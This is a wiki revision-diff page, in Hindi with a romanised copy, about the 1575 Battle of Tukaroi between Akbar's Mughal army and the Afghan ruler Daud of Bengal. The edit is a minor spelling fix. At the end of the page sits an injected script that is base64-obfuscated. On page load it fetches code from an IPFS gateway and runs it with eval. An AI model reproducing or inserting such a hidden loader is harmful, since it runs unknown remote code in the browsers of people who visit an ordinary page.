Difference between revisions of "टुकरोई का युद्ध"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''टुकरोई का युद्ध''' सन 1575 ई. में उड़ीसा के [[बालासोर ज़...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "पश्चात " to "पश्चात् ")
 
Line 2: Line 2:
  
 
*इस युद्ध में मुनीम ख़ाँ के नेतृत्व में बादशाह [[अकबर]] की [[मुग़ल]] सेना ने [[बंगाल (आज़ादी से पूर्व)|बंगाल]] के [[अफ़ग़ान]] शासक दाऊद को परास्त किया।
 
*इस युद्ध में मुनीम ख़ाँ के नेतृत्व में बादशाह [[अकबर]] की [[मुग़ल]] सेना ने [[बंगाल (आज़ादी से पूर्व)|बंगाल]] के [[अफ़ग़ान]] शासक दाऊद को परास्त किया।
*युद्ध के पश्चात दाऊद को क़ैद कर लिया गया था, किंतु कुछ महत्त्वपूर्ण शर्तों के साथ उसे छोड़ दिया गया।
+
*युद्ध के पश्चात् दाऊद को क़ैद कर लिया गया था, किंतु कुछ महत्त्वपूर्ण शर्तों के साथ उसे छोड़ दिया गया।
 
*1576 ई. के एक दूसरे युद्ध में दाऊद फिर से पराजित हुआ, लेकिन इस बार उसका वध कर दिया गया।
 
*1576 ई. के एक दूसरे युद्ध में दाऊद फिर से पराजित हुआ, लेकिन इस बार उसका वध कर दिया गया।
  

Latest revision as of 07:42, 23 June 2017

tukaroee ka yuddh san 1575 ee. mean u disa ke balasor zile mean l da gaya tha.[1]

  • is yuddh mean munim khaan ke netritv mean badashah akabar ki mugal sena ne bangal ke afagan shasak daood ko parast kiya.
  • yuddh ke pashchath daood ko qaid kar liya gaya tha, kiantu kuchh mahattvapoorn shartoan ke sath use chho d diya gaya.
  • 1576 ee. ke ek doosare yuddh mean daood phir se parajit hua, lekin is bar usaka vadh kar diya gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 176 |

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>